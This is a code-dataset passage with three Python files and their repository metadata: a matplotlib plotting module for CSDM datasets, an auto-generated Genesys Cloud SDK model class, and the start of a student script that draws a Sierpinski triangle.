kwargs_ = deepcopy(kwargs)
# add a default label if not provided by the user.
if "label" not in kwargs_.keys():
kwargs_["label"] = dv.name if one else _get_label_from_dv(dv, i)
if kwargs_["label"] != "":
legend = True
if fn == "plot":
r_plt = super().plot(x_, y_, *args, **kwargs_)
if fn == "scatter":
r_plt = super().scatter(x_, y_, *args, **kwargs_)
self.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
self.set_xlabel(x[0].axis_label)
ylabel = dv.axis_label[0] if one else "dimensionless"
self.set_ylabel(ylabel)
# self.grid(color="gray", linestyle="--", linewidth=0.5)
if legend:
self.legend()
return r_plt
def _call_uniform_2D_contour(self, csdm, fn, *args, **kwargs):
_check_2D_scalar_dataset(csdm)
kw_keys = kwargs.keys()
# set extent
x = csdm.dimensions
x0, x1 = x[0].coordinates.value, x[1].coordinates.value
# add cmap for multiple dependent variables.
cmaps_bool = False
if "cmaps" in kw_keys:
cmaps_bool = True
cmaps = kwargs.pop("cmaps")
one = True if len(csdm.dependent_variables) == 1 else False
for i, dv in enumerate(csdm.dependent_variables):
y = dv.components
if dv.quantity_type == "scalar":
if cmaps_bool:
kwargs["cmap"] = cmaps[i]
if fn == "contour":
r_plt = super().contour(x0, x1, y[0], *args, **kwargs)
if fn == "contourf":
r_plt = super().contourf(x0, x1, y[0], *args, **kwargs)
self.set_xlim(x0.min(), x0.max())
self.set_ylim(x1.min(), x1.max())
self.set_xlabel(x[0].axis_label)
self.set_ylabel(x[1].axis_label)
if one:
self.set_title(dv.name)
return r_plt
def _call_uniform_2D_image(self, csdm, *args, **kwargs):
_check_2D_scalar_and_pixel_dataset(csdm)
kw_keys = kwargs.keys()
# set extent
x = csdm.dimensions
x0, x1 = x[0].coordinates.value, x[1].coordinates.value
extent = [x0[0], x0[-1], x1[0], x1[-1]]
if kwargs["origin"] == "upper":
extent = [x0[0], x0[-1], x1[-1], x1[0]]
if "extent" not in kw_keys:
kwargs["extent"] = extent
# add cmap for multiple dependent variables.
cmaps_bool = False
if "cmaps" in kw_keys:
cmaps_bool = True
cmaps = kwargs.pop("cmaps")
one = True if len(csdm.dependent_variables) == 1 else False
for i, dv in enumerate(csdm.dependent_variables):
y = dv.components
if dv.quantity_type == "scalar":
if cmaps_bool:
kwargs["cmap"] = cmaps[i]
r_plt = super().imshow(y[0], *args, **kwargs)
if dv.quantity_type == "pixel_3":
r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)
if dv.quantity_type == "pixel_4":
r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)
self.set_xlabel(x[0].axis_label)
self.set_ylabel(x[1].axis_label)
if one:
self.set_title(dv.name)
return r_plt
try:
proj.register_projection(CSDMAxes)
except NameError:
pass
def _check_1D_dataset(csdm):
x, y = csdm.dimensions, csdm.dependent_variables
message = (
"The function requires a 1D dataset with single-component dependent "
"variables. For multiple dependent-variables, the data from all the "
"dependent variables are ploted on the same figure."
)
if len(x) != 1:
raise Exception(message)
for y_ in y:
if len(y_.components) != 1:
raise Exception(message)
def _check_2D_scalar_and_pixel_dataset(csdm):
x, y = csdm.dimensions, csdm.dependent_variables
message = (
"The function requires a 2D dataset with a single-component (scalar), "
"three components (pixel_3), or four components (pixel_4) dependent "
"variables. The pixel_3 produces an RGB image while pixel_4, a RGBA image."
)
if len(x) != 2:
raise Exception(message)
for y_ in y:
if len(y_.components) not in [1, 3, 4]:
raise Exception(message)
def _check_2D_scalar_dataset(csdm):
x, y = csdm.dimensions, csdm.dependent_variables
message = (
"The function requires a 2D dataset with a single-component (scalar), "
"dependent variables."
)
if len(x) != 2:
raise Exception(message)
for y_ in y:
if len(y_.components) != 1:
raise Exception(message)
# --------- cp plot functions ---------- #
def _preview(data, reverse_axis=None, range_=None, **kwargs):
"""Quick display of the data."""
if reverse_axis is not None:
kwargs["reverse_axis"] = reverse_axis
if range_ is None:
range_ = [[None, None], [None, None]]
x = data.dimensions
y = data.dependent_variables
y_len = len(y)
y_grid = int(y_len / 2) + 1
if len(x) == 0:
raise NotImplementedError(
"Preview of zero dimensional datasets is not implemented."
)
if len(x) > 2:
raise NotImplementedError(
"Preview of three or higher dimensional datasets " "is not implemented."
)
if np.any([x[i].type == "labeled" for i in range(len(x))]):
raise NotImplementedError("Preview of labeled dimensions is not implemented.")
fig = plt.gcf()
if y_len <= 2:
ax = fig.subplots(y_grid)
ax = [[ax]] if y_len == 1 else [ax]
else:
ax = fig.subplots(y_grid, 2)
if len(x) == 1:
one_d_plots(ax, x, y, range_, **kwargs)
if len(x) == 2:
two_d_plots(ax, x, y, range_, **kwargs)
return fig
def one_d_plots(ax, x, y, range_, **kwargs):
"""A collection of possible 1D plots."""
for i, y_item in enumerate(y):
i0 = int(i / 2)
j0 = int(i % 2)
ax_ = ax[i0][j0]
if y_item.quantity_type in scalar:
oneD_scalar(x, y_item, ax_, range_, **kwargs)
if "vector" in y_item.quantity_type:
vector_plot(x, y_item, ax_, range_, **kwargs)
# if "audio" in y_item.quantity_type:
# audio(x, y, i, fig, ax, **kwargs)
def two_d_plots(ax, x, y, range_, **kwargs):
"""A collection of possible 2D plots."""
for i, y_item in enumerate(y):
i0 = int(i / 2)
j0 = int(i % 2)
ax_ = ax[i0][j0]
if y_item.quantity_type == "pixel_3":
warn("This method interprets the `pixel_3` dataset as an RGB image.")
RGB_image(x, y_item, ax_, range_, **kwargs)
if y_item.quantity_type in scalar:
twoD_scalar(x, y_item, ax_, range_, **kwargs)
if "vector" in y_item.quantity_type:
vector_plot(x, y_item, ax_, range_, **kwargs)
def oneD_scalar(x, y, ax, range_, **kwargs):
reverse = [False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
components = y.components.shape[0]
for k in range(components):
ax.plot(x[0].coordinates, y.components[k], **kwargs)
ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
ax.set_xlabel(f"{x[0].axis_label} - 0")
ax.set_ylabel(y.axis_label[0])
ax.set_title("{0}".format(y.name))
ax.grid(color="gray", linestyle="--", linewidth=0.5)
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
def twoD_scalar(x, y, ax, range_, **kwargs):
reverse = [False, False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
x0 = x[0].coordinates.value
x1 = x[1].coordinates.value
y00 = y.components[0]
extent = [x0[0], x0[-1], x1[0], x1[-1]]
if "extent" not in kwargs.keys():
kwargs["extent"] = extent
if x[0].type == "linear" and x[1].type == "linear":
if "origin" not in kwargs.keys():
kwargs["origin"] = "lower"
if "aspect" not in kwargs.keys():
kwargs["aspect"] = "auto"
cs = ax.imshow(y00, **kwargs)
else:
if "interpolation" not in kwargs.keys():
kwargs["interpolation"] = "nearest"
cs = NonUniformImage(ax, **kwargs)
cs.set_data(x0, x1, y00)
ax.images.append(cs)
cbar = ax.figure.colorbar(cs, ax=ax)
cbar.ax.minorticks_off()
cbar.set_label(y.axis_label[0])
ax.set_xlim([extent[0], extent[1]])
ax.set_ylim([extent[2], extent[3]])
ax.set_xlabel(f"{x[0].axis_label} - 0")
ax.set_ylabel(f"{x[1].axis_label} - 1")
ax.set_title("{0}".format(y.name))
ax.grid(color="gray", linestyle="--", linewidth=0.5)
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
if reverse[1]:
ax.invert_yaxis()
def vector_plot(x, y, ax, range_, **kwargs):
reverse = [False, False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
x0 = x[0].coordinates.value
if len(x) == 2:
x1 = x[1].coordinates.value
else:
x1 = np.zeros(1)
x0, x1 = np.meshgrid(x0, x1)
u1 = y.components[0]
v1 = y.components[1]
if "pivot" not in kwargs.keys():
kwargs["pivot"] = "middle"
ax.quiver(x0, x1, u1, v1, **kwargs)
ax.set_xlabel(f"{x[0].axis_label} - 0")
ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
if len(x) == 2:
ax.set_ylim(x[1].coordinates.value.min(), x[1].coordinates.value.max())
ax.set_ylabel(f"{x[1].axis_label} - 1")
if reverse[1]:
ax.invert_yaxis()
else:
ax.set_ylim([-y.components.max(), y.components.max()])
ax.set_title("{0}".format(y.name))
ax.grid(color="gray", linestyle="--", linewidth=0.5)
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
def RGB_image(x, y, ax, range_, **kwargs):
reverse = [False, False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
y0 = y.components
ax.imshow(np.moveaxis(y0 / y0.max(), 0, -1), **kwargs)
ax.set_title("{0}".format(y.name))
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
if reverse[1]:
ax.invert_yaxis()
# def audio(x, y, i0, fig, ax):
# try:
# SOUND = 1
# import sounddevice as sd
# except ImportError:
# SOUND = 0
# string = (
# "Module 'sounddevice' is not installed. All audio data files will "
# "not be played. To enable audio files, install 'sounddevice' using"
# " 'pip install sounddevice'."
# )
# warn(string)
# plot1D(x, y, i0, ax)
# if SOUND == 1:
# data_max = y[i0].components.max()
# sd.play(0.9 * y[i0].components.T / data_max, 1 / x[0].increment.to("s").value)
| 32.198569
| 88
| 0.583755
|
from copy import deepcopy
from warnings import warn
import matplotlib.projections as proj
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.image import NonUniformImage
__author__ = "Deepansh J. Srivastava"
__email__ = "srivastava.89@osu.edu"
scalar = ["scalar", "vector_1", "pixel_1", "matrix_1_1", "symmetric_matrix_1"]
def _get_label_from_dv(dv, i):
name, unit = dv.name, dv.unit
name = name if name != "" else str(i)
label = f"{name} / ({unit})" if unit != "" else name
return label
class CSDMAxes(plt.Axes):
name = "csdm"
def plot(self, csdm, *args, **kwargs):
if csdm.__class__.__name__ != "CSDM":
return super().plot(csdm, *args, **kwargs)
return self._call_1D(csdm, "plot", *args, **kwargs)
def scatter(self, csdm, *args, **kwargs):
if csdm.__class__.__name__ != "CSDM":
return super().scatter(csdm, *args, **kwargs)
return self._call_1D(csdm, "scatter", *args, **kwargs)
def imshow(self, csdm, origin="lower", *args, **kwargs):
if csdm.__class__.__name__ != "CSDM":
return super().imshow(csdm, *args, **kwargs)
x = csdm.dimensions
if x[0].type == "linear" and x[1].type == "linear":
return self._call_uniform_2D_image(csdm, origin=origin, *args, **kwargs)
def contour(self, csdm, *args, **kwargs):
if csdm.__class__.__name__ != "CSDM":
return super().contour(csdm, *args, **kwargs)
x = csdm.dimensions
if x[0].type == "linear" and x[1].type == "linear":
return self._call_uniform_2D_contour(csdm, "contour", *args, **kwargs)
def contourf(self, csdm, *args, **kwargs):
if csdm.__class__.__name__ != "CSDM":
return super().contour(csdm, *args, **kwargs)
x = csdm.dimensions
if x[0].type == "linear" and x[1].type == "linear":
return self._call_uniform_2D_contour(csdm, "contourf", *args, **kwargs)
def _call_1D(self, csdm, fn, *args, **kwargs):
_check_1D_dataset(csdm)
x = csdm.dimensions
z = csdm.split()
one = True if len(z) == 1 else False
legend = False
for i, item in enumerate(z):
x_, y_ = item.to_list()
dv = item.dependent_variables[0]
kwargs_ = deepcopy(kwargs)
if "label" not in kwargs_.keys():
kwargs_["label"] = dv.name if one else _get_label_from_dv(dv, i)
if kwargs_["label"] != "":
legend = True
if fn == "plot":
r_plt = super().plot(x_, y_, *args, **kwargs_)
if fn == "scatter":
r_plt = super().scatter(x_, y_, *args, **kwargs_)
self.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
self.set_xlabel(x[0].axis_label)
ylabel = dv.axis_label[0] if one else "dimensionless"
self.set_ylabel(ylabel)
if legend:
self.legend()
return r_plt
def _call_uniform_2D_contour(self, csdm, fn, *args, **kwargs):
_check_2D_scalar_dataset(csdm)
kw_keys = kwargs.keys()
x = csdm.dimensions
x0, x1 = x[0].coordinates.value, x[1].coordinates.value
cmaps_bool = False
if "cmaps" in kw_keys:
cmaps_bool = True
cmaps = kwargs.pop("cmaps")
one = True if len(csdm.dependent_variables) == 1 else False
for i, dv in enumerate(csdm.dependent_variables):
y = dv.components
if dv.quantity_type == "scalar":
if cmaps_bool:
kwargs["cmap"] = cmaps[i]
if fn == "contour":
r_plt = super().contour(x0, x1, y[0], *args, **kwargs)
if fn == "contourf":
r_plt = super().contourf(x0, x1, y[0], *args, **kwargs)
self.set_xlim(x0.min(), x0.max())
self.set_ylim(x1.min(), x1.max())
self.set_xlabel(x[0].axis_label)
self.set_ylabel(x[1].axis_label)
if one:
self.set_title(dv.name)
return r_plt
def _call_uniform_2D_image(self, csdm, *args, **kwargs):
_check_2D_scalar_and_pixel_dataset(csdm)
kw_keys = kwargs.keys()
x = csdm.dimensions
x0, x1 = x[0].coordinates.value, x[1].coordinates.value
extent = [x0[0], x0[-1], x1[0], x1[-1]]
if kwargs["origin"] == "upper":
extent = [x0[0], x0[-1], x1[-1], x1[0]]
if "extent" not in kw_keys:
kwargs["extent"] = extent
cmaps_bool = False
if "cmaps" in kw_keys:
cmaps_bool = True
cmaps = kwargs.pop("cmaps")
one = True if len(csdm.dependent_variables) == 1 else False
for i, dv in enumerate(csdm.dependent_variables):
y = dv.components
if dv.quantity_type == "scalar":
if cmaps_bool:
kwargs["cmap"] = cmaps[i]
r_plt = super().imshow(y[0], *args, **kwargs)
if dv.quantity_type == "pixel_3":
r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)
if dv.quantity_type == "pixel_4":
r_plt = super().imshow(np.moveaxis(y.copy(), 0, -1), *args, **kwargs)
self.set_xlabel(x[0].axis_label)
self.set_ylabel(x[1].axis_label)
if one:
self.set_title(dv.name)
return r_plt
try:
proj.register_projection(CSDMAxes)
except NameError:
pass
def _check_1D_dataset(csdm):
x, y = csdm.dimensions, csdm.dependent_variables
message = (
"The function requires a 1D dataset with single-component dependent "
"variables. For multiple dependent-variables, the data from all the "
"dependent variables are ploted on the same figure."
)
if len(x) != 1:
raise Exception(message)
for y_ in y:
if len(y_.components) != 1:
raise Exception(message)
def _check_2D_scalar_and_pixel_dataset(csdm):
x, y = csdm.dimensions, csdm.dependent_variables
message = (
"The function requires a 2D dataset with a single-component (scalar), "
"three components (pixel_3), or four components (pixel_4) dependent "
"variables. The pixel_3 produces an RGB image while pixel_4, a RGBA image."
)
if len(x) != 2:
raise Exception(message)
for y_ in y:
if len(y_.components) not in [1, 3, 4]:
raise Exception(message)
def _check_2D_scalar_dataset(csdm):
x, y = csdm.dimensions, csdm.dependent_variables
message = (
"The function requires a 2D dataset with a single-component (scalar), "
"dependent variables."
)
if len(x) != 2:
raise Exception(message)
for y_ in y:
if len(y_.components) != 1:
raise Exception(message)
def _preview(data, reverse_axis=None, range_=None, **kwargs):
if reverse_axis is not None:
kwargs["reverse_axis"] = reverse_axis
if range_ is None:
range_ = [[None, None], [None, None]]
x = data.dimensions
y = data.dependent_variables
y_len = len(y)
y_grid = int(y_len / 2) + 1
if len(x) == 0:
raise NotImplementedError(
"Preview of zero dimensional datasets is not implemented."
)
if len(x) > 2:
raise NotImplementedError(
"Preview of three or higher dimensional datasets " "is not implemented."
)
if np.any([x[i].type == "labeled" for i in range(len(x))]):
raise NotImplementedError("Preview of labeled dimensions is not implemented.")
fig = plt.gcf()
if y_len <= 2:
ax = fig.subplots(y_grid)
ax = [[ax]] if y_len == 1 else [ax]
else:
ax = fig.subplots(y_grid, 2)
if len(x) == 1:
one_d_plots(ax, x, y, range_, **kwargs)
if len(x) == 2:
two_d_plots(ax, x, y, range_, **kwargs)
return fig
def one_d_plots(ax, x, y, range_, **kwargs):
for i, y_item in enumerate(y):
i0 = int(i / 2)
j0 = int(i % 2)
ax_ = ax[i0][j0]
if y_item.quantity_type in scalar:
oneD_scalar(x, y_item, ax_, range_, **kwargs)
if "vector" in y_item.quantity_type:
vector_plot(x, y_item, ax_, range_, **kwargs)
def two_d_plots(ax, x, y, range_, **kwargs):
for i, y_item in enumerate(y):
i0 = int(i / 2)
j0 = int(i % 2)
ax_ = ax[i0][j0]
if y_item.quantity_type == "pixel_3":
warn("This method interprets the `pixel_3` dataset as an RGB image.")
RGB_image(x, y_item, ax_, range_, **kwargs)
if y_item.quantity_type in scalar:
twoD_scalar(x, y_item, ax_, range_, **kwargs)
if "vector" in y_item.quantity_type:
vector_plot(x, y_item, ax_, range_, **kwargs)
def oneD_scalar(x, y, ax, range_, **kwargs):
reverse = [False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
components = y.components.shape[0]
for k in range(components):
ax.plot(x[0].coordinates, y.components[k], **kwargs)
ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
ax.set_xlabel(f"{x[0].axis_label} - 0")
ax.set_ylabel(y.axis_label[0])
ax.set_title("{0}".format(y.name))
ax.grid(color="gray", linestyle="--", linewidth=0.5)
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
def twoD_scalar(x, y, ax, range_, **kwargs):
reverse = [False, False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
x0 = x[0].coordinates.value
x1 = x[1].coordinates.value
y00 = y.components[0]
extent = [x0[0], x0[-1], x1[0], x1[-1]]
if "extent" not in kwargs.keys():
kwargs["extent"] = extent
if x[0].type == "linear" and x[1].type == "linear":
if "origin" not in kwargs.keys():
kwargs["origin"] = "lower"
if "aspect" not in kwargs.keys():
kwargs["aspect"] = "auto"
cs = ax.imshow(y00, **kwargs)
else:
if "interpolation" not in kwargs.keys():
kwargs["interpolation"] = "nearest"
cs = NonUniformImage(ax, **kwargs)
cs.set_data(x0, x1, y00)
ax.images.append(cs)
cbar = ax.figure.colorbar(cs, ax=ax)
cbar.ax.minorticks_off()
cbar.set_label(y.axis_label[0])
ax.set_xlim([extent[0], extent[1]])
ax.set_ylim([extent[2], extent[3]])
ax.set_xlabel(f"{x[0].axis_label} - 0")
ax.set_ylabel(f"{x[1].axis_label} - 1")
ax.set_title("{0}".format(y.name))
ax.grid(color="gray", linestyle="--", linewidth=0.5)
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
if reverse[1]:
ax.invert_yaxis()
def vector_plot(x, y, ax, range_, **kwargs):
reverse = [False, False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
x0 = x[0].coordinates.value
if len(x) == 2:
x1 = x[1].coordinates.value
else:
x1 = np.zeros(1)
x0, x1 = np.meshgrid(x0, x1)
u1 = y.components[0]
v1 = y.components[1]
if "pivot" not in kwargs.keys():
kwargs["pivot"] = "middle"
ax.quiver(x0, x1, u1, v1, **kwargs)
ax.set_xlabel(f"{x[0].axis_label} - 0")
ax.set_xlim(x[0].coordinates.value.min(), x[0].coordinates.value.max())
if len(x) == 2:
ax.set_ylim(x[1].coordinates.value.min(), x[1].coordinates.value.max())
ax.set_ylabel(f"{x[1].axis_label} - 1")
if reverse[1]:
ax.invert_yaxis()
else:
ax.set_ylim([-y.components.max(), y.components.max()])
ax.set_title("{0}".format(y.name))
ax.grid(color="gray", linestyle="--", linewidth=0.5)
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
def RGB_image(x, y, ax, range_, **kwargs):
reverse = [False, False]
if "reverse_axis" in kwargs.keys():
reverse = kwargs["reverse_axis"]
kwargs.pop("reverse_axis")
y0 = y.components
ax.imshow(np.moveaxis(y0 / y0.max(), 0, -1), **kwargs)
ax.set_title("{0}".format(y.name))
ax.set_xlim(range_[0])
ax.set_ylim(range_[1])
if reverse[0]:
ax.invert_xaxis()
if reverse[1]:
ax.invert_yaxis()
| true
| true
|
1c445c09aba76bb2eb69badc9bf601edb0a0fe02
| 6,321
|
py
|
Python
|
build/PureCloudPlatformClientV2/models/dialer_contactlist_config_change_contact_phone_number_column.py
|
cjohnson-ctl/platform-client-sdk-python
|
38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
libs/PureCloudPlatformClientV2/models/dialer_contactlist_config_change_contact_phone_number_column.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
libs/PureCloudPlatformClientV2/models/dialer_contactlist_config_change_contact_phone_number_column.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class DialerContactlistConfigChangeContactPhoneNumberColumn(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
DialerContactlistConfigChangeContactPhoneNumberColumn - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'column_name': 'str',
'type': 'str',
'callable_time_column': 'str',
'additional_properties': 'object'
}
self.attribute_map = {
'column_name': 'columnName',
'type': 'type',
'callable_time_column': 'callableTimeColumn',
'additional_properties': 'additionalProperties'
}
self._column_name = None
self._type = None
self._callable_time_column = None
self._additional_properties = None
@property
def column_name(self):
"""
Gets the column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:return: The column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:rtype: str
"""
return self._column_name
@column_name.setter
def column_name(self, column_name):
"""
Sets the column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:param column_name: The column_name of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:type: str
"""
self._column_name = column_name
@property
def type(self):
"""
Gets the type of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:return: The type of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:param type: The type of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:type: str
"""
self._type = type
@property
def callable_time_column(self):
"""
Gets the callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:return: The callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:rtype: str
"""
return self._callable_time_column
@callable_time_column.setter
def callable_time_column(self, callable_time_column):
"""
Sets the callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:param callable_time_column: The callable_time_column of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:type: str
"""
self._callable_time_column = callable_time_column
@property
def additional_properties(self):
"""
Gets the additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:return: The additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:rtype: object
"""
return self._additional_properties
@additional_properties.setter
def additional_properties(self, additional_properties):
"""
Sets the additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:param additional_properties: The additional_properties of this DialerContactlistConfigChangeContactPhoneNumberColumn.
:type: object
"""
self._additional_properties = additional_properties
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 30.244019
| 126
| 0.63376
|
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class DialerContactlistConfigChangeContactPhoneNumberColumn(object):
def __init__(self):
self.swagger_types = {
'column_name': 'str',
'type': 'str',
'callable_time_column': 'str',
'additional_properties': 'object'
}
self.attribute_map = {
'column_name': 'columnName',
'type': 'type',
'callable_time_column': 'callableTimeColumn',
'additional_properties': 'additionalProperties'
}
self._column_name = None
self._type = None
self._callable_time_column = None
self._additional_properties = None
@property
def column_name(self):
return self._column_name
@column_name.setter
def column_name(self, column_name):
self._column_name = column_name
@property
def type(self):
return self._type
@type.setter
def type(self, type):
self._type = type
@property
def callable_time_column(self):
return self._callable_time_column
@callable_time_column.setter
def callable_time_column(self, callable_time_column):
self._callable_time_column = callable_time_column
@property
def additional_properties(self):
return self._additional_properties
@additional_properties.setter
def additional_properties(self, additional_properties):
self._additional_properties = additional_properties
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
1c445c41e477e8613eedb82276ff8ae651e83f36
| 2,123
|
py
|
Python
|
stanCode_projects/boggle game solver/sierpinski.py
|
KevinCheng713/stanCode_project
|
0b2ba48be20c1737426d40eb941e8640b15acfe8
|
[
"MIT"
] | null | null | null |
stanCode_projects/boggle game solver/sierpinski.py
|
KevinCheng713/stanCode_project
|
0b2ba48be20c1737426d40eb941e8640b15acfe8
|
[
"MIT"
] | null | null | null |
stanCode_projects/boggle game solver/sierpinski.py
|
KevinCheng713/stanCode_project
|
0b2ba48be20c1737426d40eb941e8640b15acfe8
|
[
"MIT"
] | null | null | null |
"""
File: sierpinski.py
Name: 鄭凱元
---------------------------
This file recursively prints the Sierpinski triangle on GWindow.
The Sierpinski triangle is a fractal described in 1915 by Waclaw Sierpinski.
It is a self similar structure that occurs at different levels of iterations.
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GLine
from campy.gui.events.timer import pause
# Constants
ORDER = 6 # Controls the order of Sierpinski Triangle
LENGTH = 600 # The length of order 1 Sierpinski Triangle
UPPER_LEFT_X = 150 # The upper left x coordinate of order 1 Sierpinski Triangle
UPPER_LEFT_Y = 100 # The upper left y coordinate of order 1 Sierpinski Triangle
WINDOW_WIDTH = 950 # The width of the GWindow
WINDOW_HEIGHT = 700 # The height of the GWindow
# Global Variable
window = GWindow(width=WINDOW_WIDTH, height=WINDOW_HEIGHT) # The canvas to draw Sierpinski Triangle
def main():
"""
draw recursive sierpinski triangle
"""
sierpinski_triangle(ORDER, LENGTH, UPPER_LEFT_X, UPPER_LEFT_Y)
def sierpinski_triangle(order, length, upper_left_x, upper_left_y):
"""
:param order: Determine how many smaller triangles are there within a larger triangle
:param length: Determine the side length of regular triangle
:param upper_left_x: the upper left position of x coordinate
:param upper_left_y: the upper left position of y coordinate
:return: nothing
"""
if order == 0:
pass
else:
line1 = GLine(upper_left_x, upper_left_y, upper_left_x + length, upper_left_y)
line2 = GLine(upper_left_x, upper_left_y, upper_left_x+length*0.5, upper_left_y+length*0.866)
line3 = GLine(upper_left_x+length*0.5, upper_left_y+length*0.866, upper_left_x + length, upper_left_y)
window.add(line1)
window.add(line2)
window.add(line3)
sierpinski_triangle(order-1, length*0.5, upper_left_x, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length/2, upper_left_y)
sierpinski_triangle(order-1, length*0.5, upper_left_x+length*0.5/2, upper_left_y+length*0.866/2)
if __name__ == '__main__':
main()
| 37.245614
| 104
| 0.747527
|
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GLine
from campy.gui.events.timer import pause
ORDER = 6
LENGTH = 600
UPPER_LEFT_X = 150
UPPER_LEFT_Y = 100
WINDOW_WIDTH = 950
WINDOW_HEIGHT = 700
window = GWindow(width=WINDOW_WIDTH, height=WINDOW_HEIGHT)
def main():
sierpinski_triangle(ORDER, LENGTH, UPPER_LEFT_X, UPPER_LEFT_Y)
def sierpinski_triangle(order, length, upper_left_x, upper_left_y):
if order == 0:
pass
else:
line1 = GLine(upper_left_x, upper_left_y, upper_left_x + length, upper_left_y)
line2 = GLine(upper_left_x, upper_left_y, upper_left_x+length*0.5, upper_left_y+length*0.866)
